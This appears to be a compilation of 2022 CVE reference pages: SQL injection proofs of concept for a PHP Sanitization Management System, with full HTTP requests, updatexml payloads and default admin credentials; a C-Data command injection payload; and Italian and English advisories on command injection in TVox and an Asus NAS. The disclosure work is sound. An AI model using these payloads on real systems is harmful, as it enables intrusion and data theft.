Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/orders/update_status.php?id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: BGP-OSPF

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/orders/update\_status.php?id=

Vulnerability location: /php-sms/admin/orders/update\_status.php?id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/orders/update\_status.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/orders/update\_status.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44348: bug_report/SQLi-3.md at main · BGP-OSPF/bug_report

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=inquiries/view_inquiry&id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: BGP-OSPF

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/?page=inquiries/view\_inquiry&id=

Vulnerability location: /php-sms/admin/?page=inquiries/view\_inquiry&id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=inquiries/view\_inquiry&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/?page\=inquiries/view\_inquiry&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44347: bug_report/SQLi-2.md at main · BGP-OSPF/bug_report

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=quotes/view_quote&id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: BGP-OSPF

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmappA-php8.1 version

Vulnerability File: /php-sms/admin/?page=quotes/view\_quote&id=

Vulnerability location: /php-sms/admin/?page=quotes/view\_quote&id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=quotes/view\_quote&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/?page\=quotes/view\_quote&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44345: bug_report/SQLi-1.md at main · BGP-OSPF/bug_report

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/classes/Master.php?f=delete_product.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Lee

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Execute the following statement to create the "product\_list" table

CREATE TABLE \`product\_list\` (
  \`id\` int(11) NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /php-sms/classes/Master.php?f=delete\_product

Vulnerability location: /php-sms/classes/Master.php?f=delete\_product, id

dbname =sms\_db,length=6

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /php\-sms/classes/Master.php?f\=delete\_product HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/php-sms/admin/?page=services
Content-Length: 65
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-44277: bug_report/SQLi-1.md at main · llwyx200113/bug_report

A cross-site scripting (XSS) vulnerability in Book Store Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the Add New System User module.

Submitted by oretnom23 on Tuesday, October 11, 2022 - 13:26.

****Introduction****

This project is entitled **Book Store Management System**. It is a **CodeIgniter Project** application that aims to provide an automated online platform for bookstores to manage their sales transactions and records. It has a simple and pleasant user interface using **Bootstrap Framework**. It consists of user-friendly features and functionalities.

****What is CodeIgniter?****

**CodeIgniter** is a web development framework for creating dynamic websites or web apps. This framework makes use of PHP. It is a lightweight **PHP** framework that is incredibly powerful and has a number of modules that are very useful when creating a web application from scratch.

****Technologies****

Here is the list of the technologies used for developing this **Book Store Management System**:

*   **PHP**
*   **CodeIgniter 3 Framework**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **jQuery**
*   **Bootstrap**
*   **DataTables**

****Features and Functionalities****

This **Book Store Management System** is consist of the following features and functionalities:

****Admin****

*   **Login and Registration**
*   **Dashboard Page**
*   **Category Management (CRUD)**
*   **Book Management (CRUD)**
*   **Create Sales Transaction**
*   **Cart List**
*   **Manage/Update Cart List**
*   **Print Receipt**
*   **List All Transaction History**
*   **User Management (CRUD)**
*   **Logout**

****Cashier****

*   **Login and Registration**
*   **Dashboard Page**
*   **Create Sales Transaction**
*   **Cart List**
*   **Manage/Update Cart List**
*   **Print Receipt**
*   **Logout**

****How does the Book Store Management System work?****

The **Book Store Management System** in **CodeIgniter Project** is only accessible to the store's management. It contains 2 types of user roles which are the **Administrators** and the **Cashiers**. The admin users have permission to access and manage all the data on the system including the list of the book categories, books, and users. The cashier users are only allowed to create transactions with the customer. This application also generates a printable sales transaction receipt.

****Snapshots****

Here are some snapshots of the pages that can be found in this **Book Store Management System**

****Login Page****

****Admin Dashboard Page****

****Book List Page****

****Sales Transaction****

The **Book Store Management System in CodeIgniter Project** source codes is free to download on this website. Feel free to download and modify the project the way you desire to meet your requirement. Follow the instructions below to run this **CodeIgniter** project.

**How to Run?**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
2.  **Extract** the **downloaded source code **zip** file**.
3.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
4.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
5.  **Create** a **new database** named ****ci\_bsms\_db****.
6.  **Import** the provided ****SQL**** file. The file is known as ****ci\_bsms\_db.sql**** located inside the **database** folder.
7.  **Browse** the **Book Store Management System** in a **browser**. i.e. ****http://localhost/bsms\_ci/****.

****Admin Access****

Username: **admin**  
Password **admin#123**

****DEMO VIDEO****

That's it! I hope this **Book Store Management System** in **PHP** and **CodeIgniter Framework** project helps you with what you are looking for and that you'll find something useful for your current or future **PHP Projects**.

Explore more on this website for more **Tutorials** and **Free Source Codes**.

****Enjoy :)****

*   3488 views

CVE-2022-45215: Book Store Management System Project using PHP CodeIgniter 3 Free Source Code

Telenia Software s.r.l TVox before v22.0.17 was discovered to contain a remote code execution (RCE) vulnerability in the component action_export_control.php.

21 Nov

**TVox 22.0.23**

_**INFORMAZIONE:**_

Dalla release  22.0.17 è stata introdotta la gestione della **Modalità di Lavoro**.

Per saperne di più clicca sul seguente link: **Modalità di Lavoro**

**Vulnerabilità rientrate**

Dalla release 22.0.22:

1.  Blind OS Command Injection
2.  Credenziali salvate in chiaro in file di configurazione
3.  Path Traversal

**Modifiche Funzionali**

*   TVOX – Apportate migliorie al processo pbxcdr per un consumo ottimizzato delle risorse
*   TVOX – Ottimizzata la gestione dei cambi stato Master-Slave-OFF per impianti ridondati e installati tramite iso cloud
*   OCC – Apportate migliorie alla rilevazione della presenza di personalizzazioni
*   OCC – Ottimizzata la presentazione grafica della disposizione di sala in fase di modifica

**Bug Fix**

*   TVOX – Risolto bug che impediva la trasmissione di messaggi audio registrati direttamente da client durante una sessione whatsapp
*   TVOX – Risolto bug relativo alla corretta gestione di trunk SIP su base IP
*   TVOX – Risolto bug che, nel caso di controllo del dispositivo TVox Team da client, comportava la mancata eliminazione del blocco chiamata dopo la conclusione di una chiamata
*   TVOX – Risolto bug che comportava la mancata corretta sincronizzazione di Rabbitmq su impianti Support ridondati
*   OCC – Ripristinato il pulsante di link al servizio/utente/conferenza/codice di servizio all’interno di una regola d’ingresso
*   OCC – Risolto bug che impediva di caricare lo stesso template con turni reperibilità su due skillset diversi
*   TCONSOLE7 – Risolto bug che, in alcuni casi, impediva di eseguire chiamate outbound tramite TConsole7

< BACK TO TIMELINE

CVE-2022-43333: TVox 22.0.23 - Telenia Software

L’**Offensive Security Team** di **Swascan** ha identificato **3 vulnerabilità** sul prodotto **Telenia Software TVOX**.

**Telenia Software TVOX**

**Telenia Software** è un Vendor Italiano presente nel mercato UC&C e Contact Center dal 1994. Sviluppano sistemi di Customer Interaction rivolti a medie e grandi aziende, pubbliche e private che hanno l’obiettivo di migliorare la qualità delle interazioni interne e i processi di supporto clienti Omnicanale misurando la soddisfazione e i livelli di servizio erogati sia nei canali tradizionali (Voce) che nei canali digitali (Mail/Ticket, Webchat, Sms, Video, IoT, WhatsApp, Telegram, Twitter ecc).

Azienda molto attenta e sensibile alle problematiche di sicurezza e la ringraziamo per la collaborazione durante la fase di responsible disclosure.

**Descrizione del prodotto**

**TVOX** è un potente strumento di marketing in grado di utilizzare diversi canali di comunicazione per interagire con i clienti.

**Technical summary**

L’Offensive Security Team di Swascan ha rilevato alcune vulnerabilità sulla ISO scaricabile: **TVox 22.0.14**

**Vulnerability**

**CVSSv3.1**

**Attack Vector**

**Blind OS Command Injection (non autenticato)**

**9.8 Critical**

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Credenziali salvate in chiaro in file di configurazione**

**9.4 Critical**

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

**Path Traversal**

**7.5 High**

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Nella sezione seguente vengono mostrati i dettagli tecnici delle vulnerabilità rilevate.

**Blind OS Command Injection (non autenticato) CVE-2022-43333****Descrizione**

L’asset **TVOX Web Client** è vulnerabile ad attacchi di tipo Blind OS Command Injection da parte di utenti non autenticati.

Un potenziale attaccante sarà in grado di eseguire comandi sul sistema operativo target con il livello di privilegio con cui è in esecuzione il programma effettuando delle semplici richieste GET da browser senza nessun tipo di autenticazione.

Assets

*   https://X.X.X.X/t-vox/manager/html/action\_export\_control.php \[pid\]

**Proof of Concept**

Si mostrano di seguito le evidenze della vulnerabilità e di come sia stato possibile eseguire un comando del sistema operativo locale della macchina, nello specifico, come è stata innescata la richiesta di download di un file dalla vps utilizzata nell’attacco.

Evidenza  1 –  Richiesta dell’URL con il parametro PID, accodando un secondo comando da eseguire

Evidenza  2 – L’immagine mostra il comando /usr/bin/nc che posto in attesa riceve una connessione dal server

In questo modo, attraverso chiamate successive è stato possibile effettuare l’upload di una web shell in php all’interno di una cartella scrivibile dall’utente locale www-data ed esposta all’esterno, tramite web server:

Evidenza  3 – L’immagine mostra come richiamare la web shell ed eseguire comandi del sistema operativo

Dopo un’attenta analisi è stato rilevato il punto in cui viene innescata la vulnerabilità, nel file:

**/opt/telenia/tvox/php/siti/t-vox/t-vox/manager/html/action\_export\_control.php**

Evidenza  4 – Parte di codice che causa la vulnerabilità

Come si vede dall’immagine precedente, la vulnerabilità è innescata in quanto il parametro passato dall’utente al file **action\_export\_control.php** non viene validato e viene accodato così com’è al parametro della funzione **exec** di php, permettendo la concatenazione di istruzioni multiple.

Inoltre tale file è richiamabile dall’esterno e non necessita di autenticazione.

Attraverso chiamate successive è stato possibile ottenere una shell remota sul sistema, permettendo l’accesso alla rete interna.

Evidenza  5 – Accesso alla rete interna ed esecuzione shell remota

**Riferimenti**

https://owasp.org/www-community/attacks/Command\_Injection

https://cwe.mitre.org/data/definitions/78.html

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/OS\_Command\_Injection\_Defense\_Cheat\_Sheet.md

https://owasp.org/Top10/A03\_2021-Injection/

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

**Credenziali salvate in chiaro in file di configurazione****Descrizione**

È stata rilevata la presenza di credenziali non “cifrate” (hashed) all’interno del file di configurazione di Rocket.Chat.

Tale file è accessibile all’interno della distribuzione pubblica dell’applicativo da parte del vendor, e consente l’accesso amministrativo all’applicazione Rocket.Chat.

**Proof of Concept**

Analizzando la ISO messa a disposizione dal vendor è stato possibile constatare che le credenziali messe in chiaro all’interno del file di configurazione di Rocket.Chat **/etc/rocketchat/rocketchat.cfg** sono le stesse per l’applicazione nel sistema e hanno permesso l’accesso come amministratore all’appicativo Rocket.Chat

Evidenza  6 – Evidenza delle credenziali utilizzate per accedere all’applicazione Rocket.Chat

**Riferimenti**

https://owasp.org/www-community/vulnerabilities/Password\_Plaintext\_Storage

https://cheatsheetseries.owasp.org/cheatsheets/Password\_Storage\_Cheat\_Sheet.html

https://cwe.mitre.org/data/definitions/257.html

https://cwe.mitre.org/data/definitions/522.html

https://owasp.org/Top10/it/A04\_2021-Insecure\_Design/

**Path Traversal****Descrizione**

La vulnerabilità Path Traversal consente l’accesso a file presenti nel sistema operativo che risiedono al di fuori della web root dell’applicazione. Manipolando le variabili che richiedono i file, attraverso l’uso dei caratteri “../” o di un path assoluto (eg. C:\\…) è possibile accedere arbitrariamente ai file e/o cartelle contenuti nel sistema operativo come il codice sorgente dell’applicazione o file sensibili che risiedono nella macchina.

**Assets**

*   https://X.X.X.X/t-vox/repository\_update/get\_file\_list.php \[application\]

**Proof of Concept**

Lo script PHP in oggetto permetteva di listare il contenuto della cartella indicata nel parametro **application**, senza necessità di autenticazione e tramite una semplice chiamata GET via browser.

Di seguito vengono mostrate le evidenze di come è listare il contenuto di qualsiasi cartella di cui l’utente in esecuzione abbia lettura:

Evidenza  7 – Lista del contenuto cartella /home

Evidenza  8 – Esempio, contenuto della cartella /var/log

**Riferimenti**

https://cwe.mitre.org/data/definitions/23.html

https://owasp.org/Top10/A01\_2021-Broken\_Access\_Control/

https://owasp.org/www-community/attacks/Path\_Traversal

**Remediation**

Per tutte le remediation alle vulnerabilità descritte si consiglia per chi non l’avesse già fatto di aggiornare il software alla versione 22.0.23 presente all’indirizzo:

https://www.teleniasoftware.com/timeline/tvox-22-0-23/

**Disclosure Timeline**

*   19-07-2022: Vulnerabilità identificata
*   20-07-2022: Vendor contattato via email (1° tentativo)
*   26-07-2022: Vendor contattato via contatto dal sito (2° tentativo)
*   01-08-2022: Vendor contattato via form di chat sito (risposto, preso accordi via email)
*   08-11-2022: Assegnato cve-id: CVE-2022-43333 per la RCE
*   21-11-2022: Vendor pubblica aggiornamento 22.0.23 con i fix alle vulnerabilità
*   30-11-2022: Swascan pubblica la vulnerabilità

CVE-2022-43333: Security Advisory: Telenia Software TVOX

Nextcloud Server is an open source personal cloud server. Prior to versions 24.0.7 and 25.0.1, disabled download shares still allow download through preview images. Images could be downloaded and previews of documents (first page) can be downloaded without being watermarked. Versions 24.0.7 and 25.0.1 contain a fix for this issue. No known workarounds are available.

    1) Tests\Core\Controller\PreviewControllerTest::testNoPreview
    Error: Call to a member function instanceOfStorage() on null
    
    /drone/src/core/Controller/PreviewController.php:134
    /drone/src/core/Controller/PreviewController.php:84
    /drone/src/tests/Core/Controller/PreviewControllerTest.php:190
    
    2) Tests\Core\Controller\PreviewControllerTest::testValidPreview
    Error: Call to a member function instanceOfStorage() on null
    
    /drone/src/core/Controller/PreviewController.php:134
    /drone/src/core/Controller/PreviewController.php:84
    /drone/src/tests/Core/Controller/PreviewControllerTest.php:223

CVE-2022-41970: Check share attributes on preview endpoints by juliushaertl · Pull Request #34788 · nextcloud/server

A vulnerability was found in C-DATA Web Management System. It has been rated as critical. This issue affects some unknown processing of the file cgi-bin/jumpto.php of the component GET Parameter Handler. The manipulation of the argument hostname leads to argument injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214631.

**C-Data Wi-Fi Web管理系统存在未授权RCE漏洞****一、漏洞描述**

        C-Data是一家提供主流接入网技术所需全线产品的高科技企业。在中国市场，C-Data拥有电信、广电、驻地网运营商、系统集成商等众多品牌客户，产品销售更是覆盖世界各地，在南美洲、非洲、东欧、东南亚、亚太地区近百个国家的运营商网络、企业网络中得到了广泛应用。

        而其提供的Wi-Fi Web管理系统存在未授权远程代码执行漏洞，攻击者通过漏洞可以获取服务器权限。

**二、定位漏洞点**

在cgi-bin 目录下 jumpto.php 可以通过拼接GET参数，跳转到同级目录下的php或html文件

同级目录中的diagnosis目录下的diagnosis\_config\_save.php文件中提供了ping功能，其代码如下：

在指定call\_function为ping时，该函数接受post的iface参数与hostname参数，拼接指令并执行。然而此处对传进来的iface与hostname参数都没有进行校验，因此可以通过构造阶段从而实现任意命令执行。

**三、漏洞利用**

根据漏洞点构造发包请求，将其设置为POST请求包，

设置GET参数使得能够从jumpto.php跳转到diagnosis\_config\_save.php

    cgi-bin/jumpto.php?class=diagnosis&page=config_save&isphp=1
    

设置POST参数使得可以执行ping命令并对其截断从而执行任意命令

    call_function=ping&iface=eth0&hostname=127.0.0.1;cmd
    

漏洞利用结果如下，成功执行id指令，返回被攻击端的用户id：

CVE-2022-4257: VulnHub/rce1.md at main · siriuswhiter/VulnHub

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Asus NAS-M25 allows an unauthenticated attacker to inject arbitrary OS commands via unsanitized cookie values.This issue affects NAS-M25: through 1.0.1.7.

**Introduction**

We recently deployed the first component of our “zero-day identification” module, which aimed at identifying vulnerability patterns in scripting languages. It’s been a long time coming and we want to share a few technical details about it with you.

Our objective is to support identification of vulnerability patterns in both scripting languages and compiled binaries. We started off with scripting languages as it seemed to be the easiest path to get results fast. Our first order of business was to identify the distribution of scripting languages within our corpus based off our file categorization. These statistics guided us in choosing which languages to support first.

 

Given what we observed, we chose to focus on two languages: Python and PHP. JavaScript is well represented too but it’s mostly observed in client-side web administration interfaces code, which is not that interesting to an attacker. Shell scripts and Lua code will probably be the next ones to be supported.

**Static Code Analysis**

To identify vulnerabilities, we perform taint analysis by reconstructing the abstract syntax tree and we then traverse this tree. With this approach, we can dramatically increase accuracy of the results and assure that user-controlled input is actually being processed in an insecure way, reducing the overall number of false-positives reported. At the moment, we look for the following vulnerability classes:

*   arbitrary command injection (CWE-77)
*   path traversal (CWE-23)
*   SQL injection (CWE-89)
*   insecure communications (CWE-319 / CWE-923)
*   weak cryptographic ciphers / hashing algorithms usage (CWE-327)
*   loose equality (CWE-697)
*   unsafe deserialization (CWE-502)

Before deploying the PHP static code analysis checker, we tested it with hundreds of selected sample firmware images and reviewed the results. This led to the discovery of around 15 critical bugs spanning 6 different vendors. All these bugs were reported to affected vendors and are in the process of being fixed.

Except this one.

This one is special because it affects a NAS device from Asus, which according to them “_has been EOL for years_“, with the latest firmware version dating back 10 years. Since there’s no fix in sight, we don’t have to wait for the 90 days and can publish the interesting details.

With this analysis module only being the first step and active research being conducted in the area of automated detection of potential 0-day vulnerabilities, you may expect a constant stream of technical advisories about bugs we already identified and ones we still have to uncover.

Now onto the advisory !

**Arbitrary Command Injection Through Cookies**

A command injection bug was identified during our scan campaign, so we downloaded the sample and validated the automated results manually.

**Affected vendor & product**

Asus M25 NAS

**Vendor Advisory**

NONE

**Vulnerable version**

All versions

**Fixed version**

None

**CVE IDs**

CVE-2022-4221

**Impact**

9.8 (Critical) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Credit**

Q. Kaiser, ONEKEY Research Lab  
Research supported by Certainity

This bug is probably the easiest one we had to deal with. As we can see in the screenshot below, a cookie value is used unsanitized in a call to exec(). By adding a semi-colon followed by any kind of arbitrary command, we can inject commands. The code is reachable unauthenticated.

 

The interesting part here is that Asus copied this file from AjaXplorer, an open-source project, but inserted the command injection bug by trying to add some authentication layer (code between “ALPHA_CUSTOMIZE” comment).

 

**Key Takeaways**

You may argue this vulnerability is very obvious and easy to find – and you are absolutely right. It is easy to find and it should have never ended up in production in the first place. Not 10 years ago and especially not today. But bugs like this are a steady companion when researching the security of embedded devices and underline the importance of shedding light into the supply-chain of your devices. This makes the security level of SBOM, device configuration, and also proprietary applications transparent – the only way to reliably determine your own security posture and cyber resilience.

**Timeline**

**2022-09-12** – Sent coordinated disclosure request to security@asus.com

**2022-09-13** – Asus answered “\[…\] since this model, NAS-M25 is end of life for years, we will not maintain its firmware and its security.”.

**2022-12-01** – ONEKEY release its advisory

Tag

#php